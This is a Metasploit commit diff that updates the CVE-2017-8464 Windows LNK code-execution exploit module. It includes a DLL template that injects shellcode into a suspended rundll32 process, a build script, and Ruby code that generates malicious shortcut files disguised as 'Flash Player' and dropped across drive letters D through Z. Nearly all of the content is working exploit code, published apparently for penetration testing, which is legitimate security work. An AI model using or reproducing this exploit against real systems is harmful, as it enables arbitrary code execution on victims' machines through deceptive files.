Merge branch 'pr9032' into upstream-master

Land rapid7#9032, Improve CVE-2017-8464 LNK exploit

Land rapid7#9032

Author: Wei Chen

data/exploits/cve-2017-8464/src/build.sh

@@ -6,11 +6,10 @@ CCx64="x86_64-w64-mingw32"
 
 ${CCx64}-gcc -m64 -c -Os template.c -Wall -shared
 ${CCx64}-dllwrap -m64 --def template.def *.o -o temp.dll
-${CCx64}-strip -s temp.dll -o template_x64_windows.dll
+${CCx64}-strip -s temp.dll -o ../template_x64_windows.dll
 rm -f temp.dll *.o
 
 ${CCx86}-gcc -c -Os template.c -Wall -shared
 ${CCx86}-dllwrap --def template.def *.o -o temp.dll
-${CCx86}-strip -s temp.dll -o template_x86_windows.dll
+${CCx86}-strip -s temp.dll -o ../template_x86_windows.dll
 rm -f temp.dll *.o
-

data/exploits/cve-2017-8464/src/template.c

@@ -22,13 +22,13 @@ BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved)
 		ExecutePayload();
 		break;
 
-        case DLL_PROCESS_DETACH:
+		case DLL_PROCESS_DETACH:
 		break;
 
-        case DLL_THREAD_ATTACH:
+		case DLL_THREAD_ATTACH:
 		break;
 
-        case DLL_THREAD_DETACH:
+		case DLL_THREAD_DETACH:
 		break;
 	}
 
@@ -69,7 +69,7 @@ void ExecutePayload(void)
 	inline_bzero(&si, sizeof(si));
 	si.cb = sizeof(si);
 
-	// Create a suspended process, write shellcode into stack, make stack RWX, resume it
+	// Create a suspended process, write shellcode into stack, resume it
 	if(CreateProcess(NULL, "rundll32.exe", NULL, NULL, TRUE, CREATE_SUSPENDED|IDLE_PRIORITY_CLASS, NULL, NULL, &si, &pi)) {
 		ctx.ContextFlags = CONTEXT_INTEGER|CONTEXT_CONTROL;
 		GetThreadContext(pi.hThread, &ctx);

modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb

@@ -17,18 +17,23 @@ def initialize(info = {})
         info,
         'Name'            => 'LNK Code Execution Vulnerability',
         'Description'     => %q{
-          This module exploits a vulnerability in the handling of Windows Shortcut files (.LNK) that contain a dynamic icon, loaded from a malicious DLL.
+          This module exploits a vulnerability in the handling of Windows Shortcut files (.LNK)
+          that contain a dynamic icon, loaded from a malicious DLL.
 
           This vulnerability is a variant of MS15-020 (CVE-2015-0096). The created LNK file is
           similar except an additional SpecialFolderDataBlock is included. The folder ID set
           in this SpecialFolderDataBlock is set to the Control Panel. This is enough to bypass
           the CPL whitelist. This bypass can be used to trick Windows into loading an arbitrary
           DLL file.
+
+          If no PATH is specified, the module will use drive letters D through Z so the files
+          may be placed in the root path of a drive such as a shared VM folder or USB drive.
         },
         'Author'          =>
           [
-            'Uncredited',   # vulnerability discovery
-            'Yorick Koster' # msf module
+            'Uncredited',      # vulnerability discovery
+            'Yorick Koster',   # msf module
+            'Spencer McIntyre' # msf module
           ],
         'License'         => MSF_LICENSE,
         'References'      =>
@@ -56,28 +61,30 @@ def initialize(info = {})
             [ 'Windows x64', { 'Arch' => ARCH_X64 } ],
             [ 'Windows x86', { 'Arch' => ARCH_X86 } ]
           ],
-        'DefaultTarget' => 0, # Default target is Automatic
-        'DisclosureDate' => 'Jun 13 2017'
+        'DefaultTarget'   => 0, # Default target is Automatic
+        'DisclosureDate'  => 'Jun 13 2017'
       )
     )
 
     register_options(
       [
         OptString.new('FILENAME', [false, 'The LNK file', 'Flash Player.lnk']),
         OptString.new('DLLNAME', [false, 'The DLL file containing the payload', 'FlashPlayerCPLApp.cpl']),
-        OptString.new('DRIVE', [false, 'Drive letter assigned to USB drive on victim\'s machine'])
+        OptString.new('PATH', [false, 'An explicit path to where the files will be hosted'])
       ]
     )
 
     register_advanced_options(
       [
-        OptBool.new('DisablePayloadHandler', [false, 'Disable the handler code for the selected payload', true])
+        OptBool.new('DisablePayloadHandler', [false, 'Disable the handler code for the selected payload', true]),
+        OptString.new('LnkComment', [true, 'The comment to use in the generated LNK file', 'Manage Flash Player Settings']),
+        OptString.new('LnkDisplayName', [true, 'The display name to use in the generated LNK file', 'Flash Player'])
       ]
     )
   end
 
   def exploit
-    path = ::File.join(Msf::Config.data_directory, 'exploits/cve-2017-8464')
+    path = ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2017-8464')
     arch = target['Arch'] == ARCH_ANY ? payload.arch.first : target['Arch']
     datastore['EXE::Path'] = path
     datastore['EXE::Template'] = ::File.join(path, "template_#{arch}_windows.dll")
@@ -87,14 +94,14 @@ def exploit
     dll_path = store_file(dll, dll_name)
     print_status("#{dll_path} created, copy it to the root folder of the target USB drive")
 
-    if datastore['DRIVE']
-      lnk = generate_link("#{datastore['DRIVE'].split(':')[0]}:\\#{dll_name}")
+    if datastore['PATH']
+      lnk = generate_link("#{datastore['PATH'].chomp("\\")}\\#{dll_name}")
       lnk_filename = datastore['FILENAME'] || "#{rand_text_alpha(16)}.lnk"
       lnk_path = store_file(lnk, lnk_filename)
-      print_status("#{lnk_path} created, copy to the target USB drive")
+      print_status("#{lnk_path} created, copy to the target paths")
+
     else
-      # HACK: the vulnerability doesn't appear to work with UNC paths
-      # Create LNK files to different drives instead
+      # HACK: Create LNK files to different drives instead
       # Copying all the LNK files will likely trigger this vulnerability
       ('D'..'Z').each do |i|
         fname, ext = (datastore['FILENAME'] || "#{rand_text_alpha(16)}.lnk").split('.')
@@ -108,9 +115,10 @@ def exploit
   end
 
   def generate_link(path)
+    vprint_status("Generating LNK file to load: #{path}")
     path << "\x00"
-    display_name = "Flash Player\x00" # LNK Display Name
-    comment = "Manage Flash Player Settings\x00"
+    display_name = datastore['LnkDisplayName'].dup << "\x00" # LNK Display Name
+    comment = datastore['LnkComment'].dup << "\x00"
 
     # Control Panel Applet ItemID with our DLL
     cpl_applet = [